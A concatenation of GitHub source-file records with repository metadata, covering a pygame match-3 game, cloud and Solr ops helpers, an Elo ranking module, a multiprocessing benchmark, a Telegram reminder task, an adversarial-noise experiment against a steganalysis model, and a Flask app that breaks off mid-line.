Do this until the board is filled\n while not self.board.is_full():\n shifted = self.board.shift_down()\n shifted += self.board.populate(rows=[0, 1], no_valid_play_check=False, no_match3_group_check=False)\n self.animate_shift_down(shifted, self.get_num_vertical_points(points))\n self.play_sound(\"drop\")\n groups = self.board.get_valid_groups()\n bonus += 1\n bonus_score += bonus\n\n # Check if there is a valid play, if not, regenerate the board\n play = self.board.find_a_play()\n if len(play) == 0:\n self.animate_clear([(x, y) for y in range(self.board.rows) for x in range(self.board.cols)], True)\n self.board.clear()\n try:\n self.board.populate()\n except RecursionError:\n print(f\"FATAL: Couldn't regenerate the the board.\")\n pygame.quit()\n exit(1)\n self.update_board()\n\n if self.hint:\n self.hint = False\n play = self.board.find_a_play()\n if len(play) > 0:\n (swap_points, groups) = play\n self.animate_hint(*swap_points)\n self.hint_cut_score = True\n if self.game_ended:\n self.game_ended = False\n self.game_state = GameState.ENDED\n self.play_sound(\"end\")\n pygame.mixer.music.fadeout(1000)\n self.update_screen()\n elif self.pause:\n self.pause = False\n self.game_state = GameState.PAUSED\n self.music_pos = pygame.mixer.music.get_pos()\n pygame.mixer.music.fadeout(1000)\n self.update_screen()\n self.pause_time = pygame.time.get_ticks()\n\n def run(self) -> None:\n # Load high scores and preferences\n for name in (\"high_scores\", \"preferences\"):\n filename = getattr(self, f\"{name}_filename\")\n schema = getattr(self, f\"{name}_schema\")\n data = dict()\n try:\n with open(filename, 'r') as file:\n try:\n data = json.load(file)\n try:\n jsonschema.validate(data, schema)\n except jsonschema.ValidationError:\n print(f\"ERROR: In file {filename}: json doesn't conform to schema.\")\n except json.JSONDecodeError:\n print(f\"ERROR: In file {filename}: json not valid.\")\n except FileNotFoundError:\n pass\n setattr(self, name, data)\n\n pygame.init()\n pygame.mixer.init()\n self.font = pygame.font.SysFont(\"monospace\", int(self.font_size))\n self.font.set_bold(True)\n self.clock = pygame.time.Clock()\n icon = pygame.image.load(\"icon32x32.png\")\n pygame.display.set_icon(icon)\n pygame.display.set_caption(\"MATCH3PY\")\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n display_info = pygame.display.Info()\n self.screen_surf = pygame.display.set_mode((display_info.current_w, display_info.current_h), self.flags, vsync=1)\n self.resize_surfaces()\n self.update_screen()\n\n # Load audio\n if os.path.isfile(self.background_music_filename):\n pygame.mixer.music.load(self.background_music_filename)\n if os.path.isdir(self.sounds_dir):\n for filename in os.listdir(self.sounds_dir):\n sound_name = os.path.splitext(filename)[0]\n self.sounds[sound_name] = pygame.mixer.Sound(f\"{self.sounds_dir}/{filename}\")\n\n while True:\n if self.process_events(fps=self.main_loop_refresh_rate, mouse=True):\n self.update_screen()\n\n if self.game_state == GameState.RUNNING:\n self.running()\n","repo_name":"tgonzalez89/match3py","sub_path":"match3_gui.py","file_name":"match3_gui.py","file_ext":"py","file_size_in_byte":51998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5297706034","text":"from json import dumps\nfrom typing import Dict, Union\n\nfrom .Action import Action\nfrom .ActionType import ActionType\nfrom ..RetryOptions import RetryOptions\nfrom ..utils.json_utils import add_attrib, add_json_attrib\nfrom azure.functions._durable_functions import _serialize_custom_object\n\n\nclass CallActivityWithRetryAction(Action):\n \"\"\"Defines the structure of the Call Activity With Retry object.\n\n Provides the information needed by the durable extension to be able to schedule the activity.\n \"\"\"\n\n def __init__(self, function_name: str,\n retry_options: RetryOptions, input_=None):\n self.function_name: str = function_name\n self.retry_options: RetryOptions = retry_options\n self.input_ = dumps(input_, default=_serialize_custom_object)\n\n if not self.function_name:\n raise ValueError(\"function_name cannot be empty\")\n\n @property\n def action_type(self) -> int:\n \"\"\"Get the type of action this class represents.\"\"\"\n return ActionType.CALL_ACTIVITY_WITH_RETRY\n\n def to_json(self) -> Dict[str, Union[str, int]]:\n \"\"\"Convert object into a json dictionary.\n\n Returns\n -------\n Dict[str, Union[str, int]]\n The instance of the class converted into a json dictionary\n \"\"\"\n json_dict: Dict[str, Union[str, int]] = {}\n\n add_attrib(json_dict, self, 'action_type', 'actionType')\n add_attrib(json_dict, self, 'function_name', 'functionName')\n add_attrib(json_dict, self, 'input_', 'input')\n add_json_attrib(json_dict, self, 'retry_options', 'retryOptions')\n return json_dict\n","repo_name":"Azure/azure-functions-durable-python","sub_path":"azure/durable_functions/models/actions/CallActivityWithRetryAction.py","file_name":"CallActivityWithRetryAction.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"52"} +{"seq_id":"42795550226","text":"import json\nimport pandas as pd\nfrom elasticseach import Elasticsearch\n\ndef indexit(path):\n es = Elasticsearch()\n df = pd.DataFrame().from_csv(path)\n j_entries = json.loads(df.to_json(orient='records'))\n for j in j_entries:\n es.index(index='ufos', doc_type='ufosighting', body=j)\n\n\nif '__name__' == '__main__':\n indexit('scrubbed.csv')\n","repo_name":"Joapfel/Elastic-Ufo","sub_path":"indexit.py","file_name":"indexit.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70038349286","text":"from elo import CalculateurElo\n\n\ncalculateur_elo = CalculateurElo()\n\n\ndef appliquer_resultat_match(bdd, id_match_en_cours, choix):\n \"\"\"\n Etant donnés un identifiant de match en cours et un choix fait par l'utilisateur, met à jour la base de données en\n mettant à jour les scores de chaque personnage.\n\n :param bdd: objet base de données (type BDD du fichier `bdd.py`)\n :param id_match_en_cours: identifiant du match en cours (int)\n :param choix: choix fait par l'utilisateur (int, 1 ou 2)\n :return: None\n \"\"\"\n\n # On récupère toutes les infos\n match_en_cours = bdd.match_en_cours(id_match_en_cours)\n id_gagnant = match_en_cours[\"id_personnage1\"] if choix == 1 else match_en_cours[\"id_personnage2\"]\n id_perdant = match_en_cours[\"id_personnage1\"] if choix == 2 else match_en_cours[\"id_personnage2\"]\n gagnant = bdd.personnage(id_gagnant)\n perdant = bdd.personnage(id_perdant)\n\n # Si le perdant ou le gagnant n'a pas pu être trouvé avec son ID, il y a une erreur\n if gagnant is None or perdant is None:\n print(\"Résultat de match incorrect !\")\n return\n\n # On garde en mémoire l'ancien score des personnages et on calcule leur nouveau score\n ancien_score_gagnant = gagnant[\"score\"]\n ancien_score_perdant = perdant[\"score\"]\n nouveau_score_gagnant = calculateur_elo.nouveau_score_gagnant(ancien_score_gagnant, ancien_score_perdant)\n nouveau_score_perdant = calculateur_elo.nouveau_score_perdant(ancien_score_perdant, ancien_score_gagnant)\n\n # Alternative plus simple aux deux lignes précédentes :\n # nouveau_score_gagnant = ancien_score_gagnant + 1\n # nouveau_score_perdant = ancien_score_perdant - 1\n\n bdd.changer_score_personnage(id_gagnant, nouveau_score_gagnant)\n bdd.changer_score_personnage(id_perdant, nouveau_score_perdant)\n\n bdd.ajouter_match({\n \"id_gagnant\": id_gagnant,\n \"id_perdant\": id_perdant,\n \"ancien_score_gagnant\": ancien_score_gagnant,\n \"ancien_score_perdant\": ancien_score_perdant,\n \"nouveau_score_gagnant\": nouveau_score_gagnant,\n \"nouveau_score_perdant\": nouveau_score_perdant\n })\n\n bdd.supprimer_match_en_cours(id_match_en_cours)\n\n # Affichage dans le terminal du serveur du résultat du match (log)\n print(\"%d : +%d (%d -> %d), %d : -%d (%d -> %d)\" %\n (id_gagnant,\n nouveau_score_gagnant-ancien_score_gagnant,\n ancien_score_gagnant,\n nouveau_score_gagnant,\n id_perdant,\n ancien_score_perdant - nouveau_score_perdant,\n ancien_score_perdant,\n nouveau_score_perdant))\n\n\ndef creer_nouveau_match_en_cours(bdd):\n \"\"\"\n Crée un nouveau match en cours entre deux personnages aléatoires et renvoie les informations du nouveau match en\n cours.\n\n :param bdd: objet base de données (type BDD du fichier `bdd.py`)\n :return: 3-uplet (id_nouveau_match_en_cours : int, personnage1 : dictionnaire (valeur de retour de BDD.personnage),\n personnage2 : dictionnaire (valeur de retour de BDD.personnage))\n \"\"\"\n\n from random import randint\n\n nb_personnages = bdd.nombre_personnages()\n\n id_personnage1 = randint(1, nb_personnages)\n id_personnage2 = randint(1, nb_personnages-1)\n if id_personnage2 == id_personnage1:\n id_personnage2 = nb_personnages\n\n personnage1 = bdd.personnage(id_personnage1)\n personnage2 = bdd.personnage(id_personnage2)\n\n informations_nouveau_match = {\n \"id_personnage1\": personnage1[\"id\"],\n \"id_personnage2\": personnage2[\"id\"]\n }\n\n id_nouveau_match_en_cours = bdd.ajouter_match_en_cours(informations_nouveau_match)\n\n return id_nouveau_match_en_cours, personnage1, personnage2\n","repo_name":"chardetm/projet_nsi_classement_personnages","sub_path":"Projet/Correction/evolution_bdd.py","file_name":"evolution_bdd.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36818819369","text":"\"\"\"Imported\"\"\"\nfrom django.shortcuts import render\nfrom newsletter.forms import SubscriberForm\n\n\ndef index(request):\n \"\"\" A view to return the index page \"\"\"\n\n sub_form = SubscriberForm()\n\n context = {\n \"sub_form\": sub_form,\n }\n\n return render(request, 'home/index.html', context)\n","repo_name":"MarcelloMuy/ci-ms5-ecommerce-game-store","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38144951888","text":"\nimport threading, time\nfrom ResumatorRightscale import Auditing\nfrom ResumatorRightscale.Server import Server\n\nclass SolrRefreshHelper(threading.Thread):\n def __init__(self, creds, master, slave=None, thread_lock=None, do_force_reset=False, refresh_lineage=None, progress_output=True):\n threading.Thread.__init__(self)\n self.entry_exit_state = None\n \n self.server = Server(int(creds['rs_api_account_id']), creds['rs_api_user'], creds['rs_api_password'])\n\n self.master = master\n self.slave = slave\n self.do_force_reset = do_force_reset\n self.refresh_lineage = refresh_lineage\n self.progress_output = progress_output\n\n if not thread_lock:\n self.thread_lock = threading.Lock()\n else:\n self.thread_lock = thread_lock\n\n self.blocking = False\n\n def run(self):\n self.server.logger.info(\"Starting to refresh Solr with backup lineage override: %s\" % self.refresh_lineage)\n self.thread_lock.acquire(self.blocking)\n\n if self.do_force_reset == True:\n _failed_servers = self.solr_shutdown()\n\n if _failed_servers:\n self.server.logger.error(\"Unable to shutdown solr servers!\")\n self.entry_exit_state = 'failed'\n return\n\n self.solr_startup()\n\n if not self.restore_master():\n self.entry_exit_state = 'failed'\n return\n\n self.entry_exit_state = 'successful'\n\n ## if there are no slaves, then we're done here.\n if not self.slave:\n return\n\n ## sleep for a couple seconds before creating the volumes on the slave(s)\n time.sleep(5)\n if not self.restore_slaves():\n self.entry_exit_state = 'failed'\n return\n\n if self.thread_lock.locked():\n self.thread_lock.release()\n\n return\n\n def restore_master(self):\n polling_threads = []\n db_thread = None\n recipe = 'solr::do_storage_restore'\n recipe_data = {\n 'solr/backup_lineage_override': \"text:%s\" % self.refresh_lineage\n }\n\n if self.server.run_recipe(self.master, recipe, recipe_data):\n location = self.server.get_header_location()\n\n if location:\n db_thread = Auditing.AuditEntry(self.thread_lock, self.server, self.master, recipe, location, progress_output=self.progress_output)\n db_thread.start()\n polling_threads.append(db_thread)\n\n if polling_threads:\n map(lambda t: t.join(), polling_threads)\n\n if db_thread and db_thread.entry_exit_state == 'failed':\n return False\n\n return True\n\n def restore_slaves(self):\n polling_threads = []\n db_thread = None\n recipe = 'solr::do_storage_create'\n\n if self.server.run_recipe(self.slave, recipe):\n location = self.server.get_header_location()\n\n if location:\n db_thread = Auditing.AuditEntry(self.thread_lock, self.server, self.slave, recipe, location, progress_output=self.progress_output, time_limit_minutes=15)\n db_thread.start()\n polling_threads.append(db_thread)\n\n if polling_threads:\n map(lambda t: t.join(), polling_threads)\n\n if db_thread and db_thread.entry_exit_state == 'failed':\n return False\n\n return True\n\n def solr_shutdown(self):\n polling_threads = []\n block_failed = []\n failed_servers = []\n\n recipe = 'block_device::do_delete_volumes_and_terminate_server'\n recipe_data = {\n 'block_device/terminate_safety': \"text:off\"\n }\n\n _servers = [self.master, self.slave]\n\n for s in _servers:\n if self.server.run_recipe(s, recipe, recipe_data):\n location = self.server.get_header_location()\n\n if location:\n db_thread = Auditing.AuditEntry(self.thread_lock, self.server, s, recipe, location, progress_output=self.progress_output, time_limit_minutes=10)\n db_thread.start()\n _thread_data = {\n 'nickname': s,\n 'thread': db_thread\n }\n polling_threads.append(_thread_data)\n\n if polling_threads:\n for t in polling_threads:\n t['thread'].join()\n\n if t['thread'].entry_exit_state and t['thread'].entry_exit_state != 'completed':\n block_failed.append(t['nickname'])\n\n polling_threads = []\n\n if block_failed:\n for s in block_failed:\n if self.server.terminate(s):\n db_thread = Auditing.AuditServer(self.thread_lock, self.server, s)\n db_thread.start()\n _thread_data = {\n 'nickname': s,\n 'thread': db_thread\n }\n polling_threads.append(_thread_data)\n\n if polling_threads:\n for t in polling_threads:\n t['thread'].join()\n if t['thread'].entry_exit_state and (t['thread'].entry_exit_state not in ('stopped', 'terminated')):\n failed_servers.append(t['nickname'])\n\n return failed_servers\n\n def solr_startup(self):\n polling_threads = []\n failed_servers = []\n\n _servers = [self.master, self.slave]\n\n for s in _servers:\n if self.server.launch(s):\n s_thread = Auditing.AuditServer(self.thread_lock, self.server, s)\n s_thread.start()\n thread_data = {\n 'nickname': s,\n 'thread': s_thread\n }\n polling_threads.append(thread_data)\n\n if polling_threads:\n for t in polling_threads:\n t['thread'].join()\n if t['thread'].entry_exit_state and t['thread'].entry_exit_state != 'completed':\n failed_servers.append(t['nickname'])\n\n return failed_servers\n\n","repo_name":"kshenk1/rightscale_api","sub_path":"ResumatorRightscale/SolrRefreshHelper.py","file_name":"SolrRefreshHelper.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18278742280","text":"\"\"\" Pure python examples of multiprocessing. \n\nWe take a list of random integers and check which are multiple of primes for a selection of primes.\n\n\"\"\"\n\nimport multiprocessing as mp\nfrom multiprocessing import shared_memory\nimport resource\n\nfrom typing import List\nimport numpy as np\nimport sys\nimport ray\n\n# 2**23 about 1 sec on 2.6GHz Intel Core i7 12Gen per prime\nLIST_INT_SIZE = 2**23\nMAX_INT = sys.maxsize\n\n# keeping one core free in case get bored\nNR_PROC = mp.cpu_count() - 1\n\nFIRST_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]\n\nPRIMES = FIRST_PRIMES[:NR_PROC]\n\n# list of random integers with length of MAX_INT\nnp.random.seed(42)\nLIST_INT = np.random.randint(low=1, high=MAX_INT, size=LIST_INT_SIZE)\n\n\n# @ray.remote\ndef find_nr_multiple_of(number: int, int_list: List[int]):\n \"\"\"Find how many entries in int_list are multiple of number.\"\"\"\n return len([i for i in int_list if i % number == 0])\n\n\ndef run_with_one_proc(numbers: List[int], int_list: List[int]):\n \"\"\"Check how many entries in int_list are multiple for each number in numbers.\"\"\"\n\n print(\n f\"Running with single processor for {len(int_list)} random integers for {len(numbers)} primes.\"\n )\n return {nr: find_nr_multiple_of(nr, int_list) for nr in numbers}\n\n\ndef run_with_all_processors(numbers: List[int], int_list: List[int], nr_proc: int):\n \"\"\"Run with all processors.\"\"\"\n\n print(\n f\"Running with {nr_proc} processor for {len(int_list)} random integers for {len(numbers)} primes (memory_copy).\"\n )\n with mp.Pool(processes=nr_proc) as pool:\n # We use .copy() here to simulate the case where the list is not shared between processes.\n # This is (was?) the case when using multiprocessing in Windows.\n # In Unix like system, a fork is using copy-on-write, so the list is not copied by default.\n # Thus, removing the copy() here and the shared memory example are equivalent.\n nr_multiples = pool.starmap(\n find_nr_multiple_of, [(nr, int_list.copy()) for nr in numbers]\n # find_nr_multiple_of, [(nr, int_list) for nr in numbers]\n )\n return {nr: nr_multiples[i] for i, nr in enumerate(numbers)}\n\n#\ndef find_nr_multiple_of_in_shared_memory(\n number: int, shared_name: str, int_list_shape: tuple, int_list_dtype: str\n):\n \"\"\"Find how many entries in int_list are multiple of number.\"\"\"\n shared_block = shared_memory.SharedMemory(create=False, name=shared_name)\n int_list = np.ndarray(int_list_shape, dtype=int_list_dtype, buffer=shared_block.buf)\n res = len([i for i in int_list if i % number == 0])\n shared_block.close()\n return res\n\n\ndef run_with_all_processors_shared_memory(\n numbers: List[int], int_list: List[int], nr_proc: int\n):\n \"\"\"Run with all processors and shared memory\"\"\"\n print(\n f\"Running with {nr_proc} processor for {len(int_list)} random integers for {len(numbers)} primes (shared_memory).\"\n )\n shared_block = shared_memory.SharedMemory(\n create=True, size=int_list.nbytes, name=\"mp_list_share\"\n )\n\n shared_int_list = np.ndarray(\n int_list.shape, dtype=int_list.dtype, buffer=shared_block.buf\n )\n shared_int_list[:] = int_list[:]\n with mp.Pool(processes=nr_proc) as pool:\n res_handler = dict()\n for nr in numbers:\n res_handler[nr] = pool.apply_async(\n find_nr_multiple_of_in_shared_memory,\n kwds={\n \"number\": nr,\n \"shared_name\": shared_block.name,\n \"int_list_shape\": shared_int_list.shape,\n \"int_list_dtype\": shared_int_list.dtype,\n },\n )\n\n res_dict = {nr: res_handler[nr].get() for nr in numbers}\n shared_block.close()\n shared_block.unlink()\n\n return res_dict\n\n#\n# def run_with_ray(numbers: List[int], int_list: List[int]):\n# \"\"\"Run with ray.\"\"\"\n# ray.init(ignore_reinit_error=True)\n# int_list_obj_ref = ray.put(int_list)\n# nr_multiples = ray.get(\n# [find_nr_multiple_of.remote(nr, int_list_obj_ref) for nr in numbers]\n# )\n# ray.shutdown()\n# return {nr: nr_multiples[i] for i, nr in enumerate(numbers)}\n#\n\n\n\n\nresult = run_with_one_proc(PRIMES, LIST_INT)\n# result = run_with_all_processors(PRIMES, LIST_INT, NR_PROC)\n# result = run_with_all_processors_shared_memory(PRIMES, LIST_INT, NR_PROC)\n\n# result = run_with_ray(PRIMES, LIST_INT)\n\nprint(f\"Result: {result}\")\n\nprint(\n f\"Maximum used memory: Main {resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1024 } MB\\n\"\n f\"Maximum used memory: Children {resource.getrusage(resource.RUSAGE_CHILDREN).ru_maxrss / 1024 } MB\"\n)\nprint(f\"User time: {resource.getrusage(resource.RUSAGE_SELF).ru_utime} s\")\nprint(f\"System time: {resource.getrusage(resource.RUSAGE_SELF).ru_stime} s\")\n","repo_name":"NTNU-IndEcol/multiretreat","sub_path":"mp_pure_python.py","file_name":"mp_pure_python.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14019891154","text":"'''\n 画多图\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.figure(\"subplot layout\", facecolor='lightgray')\n\n# 画分子图\nfor i in range(1, 10):\n plt.subplot(3, 3, i)\n plt.text(0.5, 0.5, i, size=30, ha='center', va='center')\n # 不显示x,y轴刻度\n plt.xticks([])\n plt.yticks([])\n\n\nplt.show()\n\n","repo_name":"Hurdmmmer/PythonProject","sub_path":"ML/matplotlib-day03/demo04.py","file_name":"demo04.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32716884096","text":"import tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nimport steganalysis\nimport codec\nimport os\n\nk=0.0001\n\n\ninput_img='teststg/stg.png'\nimagearray=np.array(Image.open(input_img))\nimg=tf.constant(imagearray.reshape((1,32,32,3)),tf.float32,name='input_img')\n\nb=tf.get_variable('noise',[1,32,32,3],tf.float32,tf.zeros_initializer())\nl=tf.nn.l2_loss(b)\n\nadversary_sample=tf.add(img,b,'noise_add')\n\n_,out=steganalysis.inference_op(adversary_sample,[[0]],1)\n\nloss=tf.add(out,l*k,'sumloss')\n\nvars=tf.contrib.framework.get_variables_to_restore()\nprint(vars)\nsaver = tf.train.Saver(vars[1:])\nsess=tf.Session()\n\ntrainer=tf.train.AdamOptimizer(0.1).minimize(loss,var_list=b)\ntf.summary.FileWriter(\"alogs\", sess.graph)\n\nsess.run(tf.global_variables_initializer())\nsaver.restore(sess, 'model/steganalysismodel-200')\n\nfor i in range(10000):\n _,outvalue,l2,lossvalue=sess.run([trainer,out,l,loss])\n if not i%10:\n print('第',i,'次迭代','分析器输出为',outvalue[0][0],'噪声范数为',l2,'损失为',lossvalue[0][0])\n\nnoise=sess.run(b)[0]\nif noise.max()<2:\n k=1/noise.max()*2\n noise*=k\n newimage=np.uint8(imagearray+np.round(noise/2)*2)\n newimage=Image.fromarray(newimage)\n newimage.save('out/out.png')\n print('请运行work.py进行隐写分析')\n os._exit(0)\nelse:\n print('需要调整,噪声达到',noise.max())","repo_name":"W1Fl/steganographic-analysis-against","sub_path":"adversary.py","file_name":"adversary.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44025267590","text":"from telebot import TeleBot\nfrom celery import shared_task\n\nfrom config.settings import TELEGRAM_TOKEN\nfrom habits.servises import get_habits\nfrom django.utils import timezone\nbot = TeleBot(TELEGRAM_TOKEN)\n\n\n@shared_task(name='send_message')\ndef send_habit_message():\n \"\"\"Задача для отправки напоминания пользователю \"\"\"\n\n for habit in get_habits():\n message = f' Пора {habit.action} в {habit.time} {habit.place}'\n if habit.user.chat_id:\n bot.send_message(habit.user.chat_id, message)\n habit.last_reminder = timezone.now()\n habit.save()\n else:\n print(f\"У пользователя {habit.user} отсутствует chat_id, \"\n \"не получилось отпр��вить\")\n","repo_name":"kanlar75/Course7","sub_path":"c7/habits/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5069368251","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom seaborn import violinplot\nfrom scipy.spatial import distance_matrix\nfrom scipy.stats import spearmanr\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom matplotlib import rc\nfrom EVAL.utils.data_utils import data_directory, load_classes\nfrom EVAL.utils.model_utils import ready_model\n\n\"\"\"\nPlotting final results from all evaluations done in\n`compute_activations_n_matrices.py`\n\nNote there is absolutely no evaluations done in this\nscript, all processing related to versions of the models\nare done already. All plotting functions are model-agnostic.\n\"\"\"\n\nrc('text', usetex=True)\nplt.rcParams.update({'font.size': 20})\n\n\ndef Exp1_AB(config, lossWs, results_path, part='val_white', sup=None):\n \"\"\"\n Finegrain results plotter.\n \"\"\"\n ##### A ######\n config_version = config['config_version']\n true_bert = np.load(f'resources_{part}/_cosine_dist_matrices/bert.npy')\n correlations = []\n fig, ax = plt.subplots(1, 2, figsize=(15,6))\n for lossW in lossWs:\n if sup is None:\n inferred = np.load(f'resources_{part}/_cosine_dist_matrices/{config_version}/lossW={lossW}.npy')\n else:\n inferred = np.load(f'resources_{part}/_cosine_dist_matrices/{config_version}/lossW={lossW}-sup={sup}.npy')\n assert true_bert.shape == inferred.shape\n\n uptri1 = true_bert[np.triu_indices(true_bert.shape[0])]\n uptri2 = inferred[np.triu_indices(inferred.shape[0])]\n print(spearmanr(uptri1, uptri2))\n correlations.append(spearmanr(uptri1, uptri2)[0])\n \n ax[0].scatter(np.arange(len(lossWs)), correlations)\n ax[0].set_xticks(np.arange(len(lossWs)))\n ax[0].set_xticklabels(lossWs)\n ax[0].set_xlabel(r'Labelling pressure ($\\beta$)')\n ax[0].set_ylabel('Spearman correlations')\n ax[0].set_title('(A)')\n ax[0].grid(True)\n\n ###### B ######\n wnids, indices, categories = load_classes(num_classes=1000, df='ranked')\n all_uptris = []\n for i in range(len(lossWs)):\n lossW = lossWs[i]\n distMtx = np.load(f'resources_{part}/_L2_matrices/{config_version}/lossW={lossW}.npy') \n subMtx = distMtx[indices, :][:, indices]\n subMtx_uptri = subMtx[np.triu_indices(subMtx.shape[0])]\n print(f'Average distance = {np.mean(subMtx_uptri)}')\n all_uptris.append(subMtx_uptri)\n\n violinplot(data=all_uptris, cut=-5, linewidth=.8, gridsize=300)\n ax[1].set_xlabel(r'Labelling pressure ($\\beta$)')\n ax[1].set_xticks(np.arange(len(lossWs)))\n ax[1].set_xticklabels(lossWs)\n ax[1].set_ylabel('Pairwise class distance')\n ax[1].set_title('(B)')\n plt.tight_layout()\n plt.savefig(os.path.join(results_path, 'Exp1_AB.jpeg'))\n print('[Check] Plotted at:', os.path.join(results_path, 'Exp1_AB.jpeg'))\n\n\ndef Exp2_AB(config, lossWs, results_path, part='val_white', sup=None):\n \"\"\"\n Coarsegrain results plotter.\n \"\"\"\n config_version = config['config_version']\n true_bert = np.load(f'resources_{part}/_cosine_dist_matrices/bert.npy')\n\n sups = ['reptile', 'amphibian', 'primate', 'bird', 'canidae']\n markers = ['*', '<', 'o', '^', '>']\n fig, ax = plt.subplots(1, 2, figsize=(15,6))\n\n accu_correlations = np.empty((len(sups), len(lossWs)))\n for i in range(len(sups)):\n\n sup = sups[i]\n correlations = []\n\n for j in range(len(lossWs)):\n\n lossW = lossWs[j]\n\n if sup is None:\n inferred = np.load(f'resources_{part}/_cosine_dist_matrices/{config_version}/lossW={lossW}.npy')\n else:\n inferred = np.load(f'resources_{part}/_cosine_dist_matrices/{config_version}/lossW={lossW}-{sup}.npy')\n assert true_bert.shape == inferred.shape\n\n uptri1 = true_bert[np.triu_indices(true_bert.shape[0])]\n uptri2 = inferred[np.triu_indices(inferred.shape[0])]\n print('uptri spearman', spearmanr(uptri1, uptri2))\n\n accu_correlations[i, j] = spearmanr(uptri1, uptri2)[0]\n correlations.append(spearmanr(uptri1, uptri2)[0])\n\n if sups[i] == 'canidae':\n ax[0].scatter(np.arange(len(lossWs)), correlations, marker=markers[i], label='dog')\n else:\n ax[0].scatter(np.arange(len(lossWs)), correlations, marker=markers[i], label=sups[i]) \n \n\n ax[0].plot(np.arange(len(lossWs)), np.mean(accu_correlations, axis=0), label='average')\n ax[0].set_xticks(np.arange(len(lossWs)))\n ax[0].set_xticklabels(lossWs)\n # ax[0].set_xlabel(r'Labelling pressure ($\\beta$)')\n ax[0].set_ylabel('Spearman correlations')\n ax[0].set_title('(A)')\n ax[0].grid(True)\n\n\n print('A is ok')\n ###### B #######\n dfs = ['reptile', 'amphibian', 'primate', 'bird', 'canidae'] \n markers = ['*', '<', 'o', '^', '>']\n\n all_ratios = np.zeros((len(dfs), len(lossWs)))\n for z in range(len(dfs)):\n df = dfs[z]\n print(f'processing {df}...')\n wnids, indices, categories = load_classes(num_classes=1000, df=df) # num_classes doesn't matter cuz subset<1000\n ratios = [] # ratio btw dog2dog and dog2rest\n for i in range(len(lossWs)):\n lossW = lossWs[i]\n # the entire 1k*1k matrix\n distMtx = np.load(f'resources_{part}/_L2_matrices/{config_version}/lossW={lossW}-{df}.npy')\n # the dogs matrix \n subMtx = distMtx[indices, :][:, indices]\n # the uptri of dogs matrix\n subMtx_uptri = subMtx[np.triu_indices(subMtx.shape[0])]\n # what we already know about dog vs dog\n mean_dist = np.mean(subMtx_uptri)\n std_dist = np.std(subMtx_uptri)\n # ------------------------------------------------------\n # new stuff: dog vs rest\n nonDog_indices = [i for i in range(1000) if i not in indices]\n # shape = (129, 871)\n dogVSrest_mtx = distMtx[indices, :][:, nonDog_indices]\n dogVSrest_mean_dist = np.mean(dogVSrest_mtx)\n dogVSrest_std_dist = np.std(dogVSrest_mtx)\n ratio = mean_dist / dogVSrest_mean_dist\n ratios.append(ratio)\n\n if df == 'canidae':\n df = 'dog'\n ax[1].scatter(np.arange(len(lossWs)), ratios, label=f'{df}', marker=markers[z])\n all_ratios[z, :] = ratios\n \n print('all_ratios.shape = ', all_ratios.shape)\n average_ratios = np.mean(all_ratios, axis=0)\n ax[1].plot(np.arange(len(lossWs)), average_ratios, label='average')\n ax[1].set_xlabel(r'Labelling pressure ($\\beta$)')\n ax[1].set_ylabel('Distance ratio')\n ax[1].grid(True)\n ax[1].set_title('(B)')\n ax[1].set_xticks(np.arange(len(lossWs)))\n ax[1].set_xticklabels(lossWs)\n plt.tight_layout()\n plt.legend()\n plt.savefig(os.path.join(results_path, 'Exp2_AB.jpeg'))\n print('[Check] Plotted at:', os.path.join(results_path, 'Exp2_AB.jpeg'))\n\n\ndef execute(config):\n lossWs = [0, 0.1, 1, 2, 3, 5, 7, 10]\n\n config_version = config['config_version']\n results_path = f'RESULTS/revision_1/{config_version}'\n if not os.path.exists(results_path):\n os.makedirs(results_path)\n\n if 'finegrain' in config_version:\n Exp1_AB(config, lossWs, results_path)\n else:\n Exp2_AB(config, lossWs, results_path)\n \n \n\n\n","repo_name":"don-tpanic/DeepLangThought","sub_path":"EVAL/results_vis.py","file_name":"results_vis.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38331702450","text":"import requests\nfrom primerjalnik import app, db, logger, consul_connection\nfrom flask import render_template, redirect, url_for, flash, get_flashed_messages, request, jsonify, make_response\nfrom primerjalnik.models import Item, User\nfrom primerjalnik.forms import RegisterForm, LoginForm, SearchForm\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom primerjalnik.scraper import get_products\nfrom primerjalnik.utils import ProductsOut, LiveOut, ReadyOut, get_info\n\nmetrics_data = {'searched_product_count': {}, 'returned_products': 0}\n\n@app.route('/')\n@app.route('/home')\ndef home_page():\n\n try:\n index, data = consul_connection.kv.get('maintenance')\n if data['Value'].decode('utf-8') == 'true':\n return render_template('maintenance.html')\n except:\n pass\n\n cat_fact = 